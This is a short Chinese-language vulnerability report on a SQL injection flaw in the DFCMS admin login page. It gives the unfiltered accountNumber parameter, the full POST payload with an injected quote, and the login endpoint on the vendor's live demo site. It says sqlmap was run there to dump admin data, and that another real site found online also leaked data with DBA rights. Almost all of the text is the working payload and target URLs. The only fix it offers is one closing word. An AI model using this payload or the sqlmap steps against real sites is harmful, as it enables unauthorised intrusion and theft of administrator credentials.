程序: DFCMS
漏洞文件:acAdmin/acAdminLogin.jsp
accountNumber= 参数没有过滤。(也就是编号对应的地方)
post:isEncrypt=0&loginFailPage=acAdminLogin.jsp&accountNumber=1%27&loginName=admin&loginPwd=test&mianlogin=on&imgLogin.x=66&imgLogin.y=16
官方demo演示:
http://www.dfcms.net/acAdmin/acAdminLogin.jsp
编号处输入1’
报错:
sqlmap跑下
注射点:
http://www.dfcms.net/acAdmin/acAdmin.do?method=login
post:isEncrypt=0&loginFailPage=acAdminLogin.jsp&accountNumber=1%27&loginName=admin&loginPwd=test&mianlogin=on&imgLogin.x=97&imgLogin.y=25
admin数据:
网上的另外一个站点也跑出数据(dba)
过滤~